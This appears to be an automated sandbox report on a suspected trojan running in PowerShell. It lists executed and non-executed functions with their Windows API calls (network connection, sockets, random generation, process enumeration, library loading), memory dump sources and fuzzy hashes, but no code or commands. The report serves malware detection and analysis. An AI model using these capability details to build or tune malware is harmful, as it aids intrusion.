Author: Florian Roth Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	07:43:28
Start date:	26/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	0.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	13.5%
Total number of Nodes:	170
Total number of Limit Nodes:	5

Executed Functions

Function 000001A6ED331184 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
encryptionCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextA.ADVAPI32 ref: 000001A6ED3311B8
CryptAcquireContextA.ADVAPI32 ref: 000001A6ED3311DC
CryptGenRandom.ADVAPI32 ref: 000001A6ED3311F0
CryptReleaseContext.ADVAPI32 ref: 000001A6ED331204

Strings

Microsoft Base Cryptographic Provider v1.0, xrefs: 000001A6ED3311A2, 000001A6ED3311C6
(, xrefs: 000001A6ED3311D4

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: Crypt$Context$Acquire$RandomRelease
String ID: ($Microsoft Base Cryptographic Provider v1.0
API String ID: 685801729-4046902070
Opcode ID: 0f7b575704e2efa4e71594adee21552c9336b074ba1ad3f512173577c0e57d68
Instruction ID: 0b7b5c252243d6ba2b2591747701b4bd1936978a6e9436d114156d827ae70310
Opcode Fuzzy Hash: 0f7b575704e2efa4e71594adee21552c9336b074ba1ad3f512173577c0e57d68
Instruction Fuzzy Hash: C1019239715A40C2F720CFA9E98839DB7A1F7EAB84F498025C65983365DF78C54DC741

Function 00007FFD347983D5 Relevance: .5, Instructions: 508
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.4604272856.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06e884aaf3d97097a663324459028e3f526586813836ae09a6dd5142c9fc9510
Instruction ID: d51e5b6d5fe40446a9715214c84f88b3d956206d72d8c5078b6c81c35c5c4b7a
Opcode Fuzzy Hash: 06e884aaf3d97097a663324459028e3f526586813836ae09a6dd5142c9fc9510
Instruction Fuzzy Hash: 21F1A2A2A0D7C65FE7578B2888B55A57FF0EF5322070941EBC189CB1E3DA1D6C06C792

Function 000001A6ED33EA48 Relevance: 9.1, APIs: 6, Instructions: 109
networkCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000001A6ED34E0FC: RevertToSelf.ADVAPI32 ref: 000001A6ED34E10A

InternetOpenA.WININET ref: 000001A6ED33EB0C
InternetSetOptionA.WININET ref: 000001A6ED33EB2C
InternetSetOptionA.WININET ref: 000001A6ED33EB44
InternetConnectA.WININET ref: 000001A6ED33EB7A
InternetSetOptionA.WININET ref: 000001A6ED33EBB7
InternetSetOptionA.WININET ref: 000001A6ED33EBE2

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: Internet$Option$ConnectOpenRevertSelf
String ID:
API String ID: 1513466045-0
Opcode ID: a9b8b553a89bf16a576f3c9bc92d43a984d256c5d92c920833b48d6b9218c37a
Instruction ID: ebe3f4352ce5569d617b83ef5ce276f7e9b6a31cd85e7b94fe7e5ffffd47d16f
Opcode Fuzzy Hash: a9b8b553a89bf16a576f3c9bc92d43a984d256c5d92c920833b48d6b9218c37a
Instruction Fuzzy Hash: E241D03D302B80C2EB24DB19E4957D96361F3A7748F080126DA1A577A6DF3CC40A8702

Function 000001A6ED33F014 Relevance: 4.6, APIs: 3, Instructions: 66
networkCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000001A6ED33F118: WSAStartup.WS2_32 ref: 000001A6ED33F136

WSASocketA.WS2_32 ref: 000001A6ED33F042
WSAIoctl.WS2_32 ref: 000001A6ED33F08F
closesocket.WS2_32 ref: 000001A6ED33F0EE

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: IoctlSocketStartupclosesocket
String ID:
API String ID: 365704328-0
Opcode ID: 9f6035121241c12ff71e8e552415c275c25b201d0c9d2d3551ffb33b20d91594
Instruction ID: f2b983abc77b00beb9c0339d057dfb2692e935e02e87f22a5437d0d7aadaabb6
Opcode Fuzzy Hash: 9f6035121241c12ff71e8e552415c275c25b201d0c9d2d3551ffb33b20d91594
Instruction Fuzzy Hash: AA21E77A70578082E720DF18F64479AB794F3AA7E8F984625DFAD03B95DB3CC5098B01

Function 000001A6ED33F118 Relevance: 3.0, APIs: 2, Instructions: 42
networkCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32 ref: 000001A6ED33F136
WSACleanup.WS2_32 ref: 000001A6ED33F1D2

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: CleanupStartup
String ID:
API String ID: 915672949-0
Opcode ID: d22241c7f1bd4084ee50ee5593018a46650914ab47a10bd4edb93220355cbedb
Instruction ID: 0ba490608e2d60dee1d23fb0be4ff1db6e29309ee2df398c27b42627ab3bc506
Opcode Fuzzy Hash: d22241c7f1bd4084ee50ee5593018a46650914ab47a10bd4edb93220355cbedb
Instruction Fuzzy Hash: 9511183C703A41C6FB24EB6CE9593E422A6A763305F88013997154A3D3DE7E454DC712

Function 000001A6ED2F96B4 Relevance: 1.6, APIs: 1, Instructions: 149
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 000001A6ED2F977B

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 74d038c8b1c51bf1d7765a817c366e135375bbd51fab872694d5e2c19deb3bea
Instruction ID: c67db27c5cd87c4109928d8cabb03038788349c1d121640aaaeb9b510567524c
Opcode Fuzzy Hash: 74d038c8b1c51bf1d7765a817c366e135375bbd51fab872694d5e2c19deb3bea
Instruction Fuzzy Hash: A7719636319B8486CAA0CB0AE49035AB7A0F7C9B94F548525EFCE83B68DF3DD455CB00

Function 00007FFD347991A8 Relevance: .1, Instructions: 148
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.4604272856.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0546cfe1981ca72da3e19f31d6c388abfd7678fd10076ac8ecdf546ffd1f99b6
Instruction ID: bda51c0626edd9ac01f21c042897a84bff9bb95500acdfe48eab9e57f69a445c
Opcode Fuzzy Hash: 0546cfe1981ca72da3e19f31d6c388abfd7678fd10076ac8ecdf546ffd1f99b6
Instruction Fuzzy Hash: DC41D57161CB098FD758DE0CC4D59B6B3E1FBA9350B10057DE48AC7696DA26FC41CB81

Function 00007FFD34794045 Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.4604272856.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction ID: 40e2684704bb1307ed0675c10ce80ac1e6e70e2e0328b6af30220f6e5a8511aa
Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction Fuzzy Hash: D201677121CB0C8FD744EF4CE451AA5B7E0FB95364F10056DE58AC3651D636E881CB45

Function 00007FFD347992DF Relevance: .0, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.4604272856.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5547131d4f7ec8804c6aae26a5359e00412f1e52a986eb3d6db6d2b6b57fc48d
Instruction ID: ee062852776b8a7d2a45155e575aa18602d119be89053bd4e72607dd44115457
Opcode Fuzzy Hash: 5547131d4f7ec8804c6aae26a5359e00412f1e52a986eb3d6db6d2b6b57fc48d
Instruction Fuzzy Hash: 8CF0547271CB458FDB5CDA1CF4519B973D1EB95334F10062EF08BC2696DA26E8428745

Function 00007FFD34861D6F Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.4604831158.00007FFD34860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34860000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ded8c451ef0cc1d614cca78380e0caadf9cd18c14a1408221a0d046da7c9866
Instruction ID: 53f8f5a8f986a7bb5af0b5bab487b543d9f0c5805c7bc93e1c9884d885b804f5
Opcode Fuzzy Hash: 6ded8c451ef0cc1d614cca78380e0caadf9cd18c14a1408221a0d046da7c9866
Instruction Fuzzy Hash: 07F06562749C455FDFC5EF1C98E9AA137C5EF6A71071400A9E18EC72A3DE68EC44C781

Non-executed Functions

Function 000001A6ED356514 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 460
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__doserrno.LIBCMT ref: 000001A6ED35656A
_errno.LIBCMT ref: 000001A6ED356571
_invalid_parameter_noinfo.LIBCMT ref: 000001A6ED35657C

Strings

U, xrefs: 000001A6ED356ADE

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: __doserrno_errno_invalid_parameter_noinfo
String ID: U
API String ID: 3902385426-4171548499
Opcode ID: a469b43449293490d86ed3caa32e41753b17625943497404ea198177ea08bf0b
Instruction ID: f97b65545f81ee47061bf914def049f6f68c10a95293f7c507e6df85804d4eab
Opcode Fuzzy Hash: a469b43449293490d86ed3caa32e41753b17625943497404ea198177ea08bf0b
Instruction Fuzzy Hash: 0012047A316641C6EB20CF2DD4843EE77A1F7A7748F680116EA8943795DB3DC889CB12

Function 000001A6ED34867C Relevance: 46.6, APIs: 22, Strings: 4, Instructions: 1078processCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 000001A6ED348FA0
CreateToolhelp32Snapshot.KERNEL32 ref: 000001A6ED348FD9
Process32First.KERNEL32 ref: 000001A6ED348FFB

Strings

x64, xrefs: 000001A6ED348FB2, 000001A6ED348FC0
x86, xrefs: 000001A6ED348FC7, 000001A6ED3490B0
%s%d%d, xrefs: 000001A6ED349046
%s%d%d%s%s%d, xrefs: 000001A6ED3490E0

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: CreateCurrentFirstProcessProcess32SnapshotToolhelp32
String ID: %s%d%d%s%s%d$%s%d%d$x64$x86
API String ID: 718051232-1833344708
Opcode ID: 44ee8957408f2f3c2d0d1c1155748847862033341b6ca19cb8ca6a6e19bffbea
Instruction ID: 00e1c4fa36c90a1e7589fd928561207c8cfefd7c240df4531d0630b0bec34fd0
Opcode Fuzzy Hash: 44ee8957408f2f3c2d0d1c1155748847862033341b6ca19cb8ca6a6e19bffbea
Instruction Fuzzy Hash: A882B43DB07640C2FA68DB2E98543E912D0A7A7780F9C4126D90A47BD5DE3EC98F8743

Function 000001A6ED352F9C Relevance: 37.4, APIs: 19, Strings: 2, Instructions: 694COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 000001A6ED352FFD

Part of subcall function 000001A6ED351600: _getptd.LIBCMT ref: 000001A6ED351616
Part of subcall function 000001A6ED351600: __updatetlocinfo.LIBCMT ref: 000001A6ED35164B
Part of subcall function 000001A6ED351600: __updatetmbcinfo.LIBCMT ref: 000001A6ED351672

_errno.LIBCMT ref: 000001A6ED353002

Part of subcall function 000001A6ED351D18: _getptd_noexit.LIBCMT ref: 000001A6ED351D1C

_fileno.LIBCMT ref: 000001A6ED35302F

Part of subcall function 000001A6ED355A54: _errno.LIBCMT ref: 000001A6ED355A5D
Part of subcall function 000001A6ED355A54: _invalid_parameter_noinfo.LIBCMT ref: 000001A6ED355A68

write_multi_char.LIBCMT ref: 000001A6ED35366B
write_string.LIBCMT ref: 000001A6ED353688
write_multi_char.LIBCMT ref: 000001A6ED3536A5
write_string.LIBCMT ref: 000001A6ED353704
write_string.LIBCMT ref: 000001A6ED35373B
write_multi_char.LIBCMT ref: 000001A6ED35375D
free.LIBCMT ref: 000001A6ED353771
_isleadbyte_l.LIBCMT ref: 000001A6ED353842
write_char.LIBCMT ref: 000001A6ED353858
write_char.LIBCMT ref: 000001A6ED353879
_errno.LIBCMT ref: 000001A6ED35397C
_invalid_parameter_noinfo.LIBCMT ref: 000001A6ED353987

Strings

, xrefs: 000001A6ED35363F
@, xrefs: 000001A6ED35301B

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
String ID: $@
API String ID: 3318157856-1077428164
Opcode ID: 43138757bcee35b18d1a9352f63dda4217664694579bf9df27f2658c9d71e8f1
Instruction ID: d4c5a2499e9abbe9645f5841ac1b9af2918b3592a48f3f2882ea389dd6a243a5
Opcode Fuzzy Hash: 43138757bcee35b18d1a9352f63dda4217664694579bf9df27f2658c9d71e8f1
Instruction Fuzzy Hash: 1652DEBA70A684C6FB65CB1DD5443FEABA0B763794F1C1115DE4647AE4DB38C848CB02

Function 000001A6ED352528 Relevance: 35.7, APIs: 19, Strings: 1, Instructions: 687COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 000001A6ED352589

Part of subcall function 000001A6ED351600: _getptd.LIBCMT ref: 000001A6ED351616
Part of subcall function 000001A6ED351600: __updatetlocinfo.LIBCMT ref: 000001A6ED35164B
Part of subcall function 000001A6ED351600: __updatetmbcinfo.LIBCMT ref: 000001A6ED351672

_errno.LIBCMT ref: 000001A6ED35258E

Part of subcall function 000001A6ED351D18: _getptd_noexit.LIBCMT ref: 000001A6ED351D1C

_fileno.LIBCMT ref: 000001A6ED3525BB

Part of subcall function 000001A6ED355A54: _errno.LIBCMT ref: 000001A6ED355A5D
Part of subcall function 000001A6ED355A54: _invalid_parameter_noinfo.LIBCMT ref: 000001A6ED355A68

write_multi_char.LIBCMT ref: 000001A6ED352BEB
write_string.LIBCMT ref: 000001A6ED352C08
write_multi_char.LIBCMT ref: 000001A6ED352C25
write_string.LIBCMT ref: 000001A6ED352C84
write_string.LIBCMT ref: 000001A6ED352CBB
write_multi_char.LIBCMT ref: 000001A6ED352CDD
free.LIBCMT ref: 000001A6ED352CF1
_isleadbyte_l.LIBCMT ref: 000001A6ED352DC2
write_char.LIBCMT ref: 000001A6ED352DD8
write_char.LIBCMT ref: 000001A6ED352DF9
_errno.LIBCMT ref: 000001A6ED352EF3
_invalid_parameter_noinfo.LIBCMT ref: 000001A6ED352EFE

Strings

, xrefs: 000001A6ED352BBF

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
String ID:
API String ID: 3318157856-3916222277
Opcode ID: fca6f3964dd5be39caa2a1998c64648d50546d36c07ae532eb44751125f6f7d4
Instruction ID: cfaeff35a83205aeff76f4345130696f74028edf28b73ded92e9751b7ff075ea
Opcode Fuzzy Hash: fca6f3964dd5be39caa2a1998c64648d50546d36c07ae532eb44751125f6f7d4
Instruction Fuzzy Hash: C152DE3E70A684C6FB75CB9DD6443EE6BA0B763784F2C0005DE4616AD5DB79C848CB42

Function 000001A6ED30239C Relevance: 32.2, APIs: 16, Strings: 2, Instructions: 694COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 000001A6ED3023FD

Part of subcall function 000001A6ED300A00: _getptd.LIBCMT ref: 000001A6ED300A16
Part of subcall function 000001A6ED300A00: __updatetlocinfo.LIBCMT ref: 000001A6ED300A4B
Part of subcall function 000001A6ED300A00: __updatetmbcinfo.LIBCMT ref: 000001A6ED300A72

_errno.LIBCMT ref: 000001A6ED302402

Part of subcall function 000001A6ED301118: _getptd_noexit.LIBCMT ref: 000001A6ED30111C

_fileno.LIBCMT ref: 000001A6ED30242F

Part of subcall function 000001A6ED304E54: _errno.LIBCMT ref: 000001A6ED304E5D
Part of subcall function 000001A6ED304E54: _invalid_parameter_noinfo.LIBCMT ref: 000001A6ED304E68

write_multi_char.LIBCMT ref: 000001A6ED302A6B
write_string.LIBCMT ref: 000001A6ED302A88
write_multi_char.LIBCMT ref: 000001A6ED302AA5
write_string.LIBCMT ref: 000001A6ED302B04
write_string.LIBCMT ref: 000001A6ED302B3B
write_multi_char.LIBCMT ref: 000001A6ED302B5D
free.LIBCMT ref: 000001A6ED302B71
_isleadbyte_l.LIBCMT ref: 000001A6ED302C42
write_char.LIBCMT ref: 000001A6ED302C58
write_char.LIBCMT ref: 000001A6ED302C79
_errno.LIBCMT ref: 000001A6ED302D7C
_invalid_parameter_noinfo.LIBCMT ref: 000001A6ED302D87

Strings

@, xrefs: 000001A6ED30241B
, xrefs: 000001A6ED302A3F

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
String ID: $@
API String ID: 3318157856-1077428164
Opcode ID: 4a38c0d1bf29713d97454c66998f6f1c8deab35124594071882b000f93717dbb
Instruction ID: f75a53be80497d6170c5a98b284772b1b9ccec8909b51d17e677f853dc630dec
Opcode Fuzzy Hash: 4a38c0d1bf29713d97454c66998f6f1c8deab35124594071882b000f93717dbb
Instruction Fuzzy Hash: 9952D03E70A694CAFB75CA1D96443EE6BA4B7677C4F2C0005DA4607AD5FB78C848CB42

Function 000001A6ED301928 Relevance: 28.6, APIs: 14, Strings: 2, Instructions: 645COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 000001A6ED301989

Part of subcall function 000001A6ED300A00: _getptd.LIBCMT ref: 000001A6ED300A16
Part of subcall function 000001A6ED300A00: __updatetlocinfo.LIBCMT ref: 000001A6ED300A4B
Part of subcall function 000001A6ED300A00: __updatetmbcinfo.LIBCMT ref: 000001A6ED300A72

_errno.LIBCMT ref: 000001A6ED30198E

Part of subcall function 000001A6ED301118: _getptd_noexit.LIBCMT ref: 000001A6ED30111C

_fileno.LIBCMT ref: 000001A6ED3019BB

Part of subcall function 000001A6ED304E54: _errno.LIBCMT ref: 000001A6ED304E5D
Part of subcall function 000001A6ED304E54: _invalid_parameter_noinfo.LIBCMT ref: 000001A6ED304E68

write_multi_char.LIBCMT ref: 000001A6ED301FEB
write_string.LIBCMT ref: 000001A6ED302008
_errno.LIBCMT ref: 000001A6ED3022F3
_invalid_parameter_noinfo.LIBCMT ref: 000001A6ED3022FE

Strings

0, xrefs: 000001A6ED301D28
-, xrefs: 000001A6ED301F9C

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: _errno$Locale_invalid_parameter_noinfo$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexitwrite_multi_charwrite_string
String ID: -$0
API String ID: 3246410048-417717675
Opcode ID: b24723a82e80602d9e360efdf77550aa3bb04d5b03f0ab6de1a502a8a2fed25a
Instruction ID: 01a17cdff8fc01e9f8bc58dc5ed70d3585a2f0a3611bb27d323ce4a2176e6fe3
Opcode Fuzzy Hash: b24723a82e80602d9e360efdf77550aa3bb04d5b03f0ab6de1a502a8a2fed25a
Instruction Fuzzy Hash: 8242E17E70A684C6FB78CB5D96403FE6BA4B7677C4F1C0105DA4686AD6E738C848CB42

Function 000001A6ED305914 Relevance: 26.7, APIs: 14, Strings: 1, Instructions: 460COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 000001A6ED30596A
_errno.LIBCMT ref: 000001A6ED305971
_invalid_parameter_noinfo.LIBCMT ref: 000001A6ED30597C

Strings

U, xrefs: 000001A6ED305EDE

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: __doserrno_errno_invalid_parameter_noinfo
String ID: U
API String ID: 3902385426-4171548499
Opcode ID: 5c9e67efb867bf0e13aa39ce989e8adbf2eb3d39c19cdce2a19d0d9c61058b81
Instruction ID: 6f63749cdf5ffc44ab02980e079d6fa513343eff15439b803aefff4cf202e714
Opcode Fuzzy Hash: 5c9e67efb867bf0e13aa39ce989e8adbf2eb3d39c19cdce2a19d0d9c61058b81
Instruction Fuzzy Hash: C112E43A316641C6EB20CF2CD4843DEB7A1F7A7794F584216EA8943A95EB3DC44DCB12

Function 000001A6ED347B38 Relevance: 26.0, APIs: 10, Strings: 7, Instructions: 545COMMONLIBRARYCODE

Download Yara Rule

APIs

_snprintf.LIBCMT ref: 000001A6ED347D66
_snprintf.LIBCMT ref: 000001A6ED347D83
_snprintf.LIBCMT ref: 000001A6ED347CA5

Part of subcall function 000001A6ED34F63C: _errno.LIBCMT ref: 000001A6ED34F673
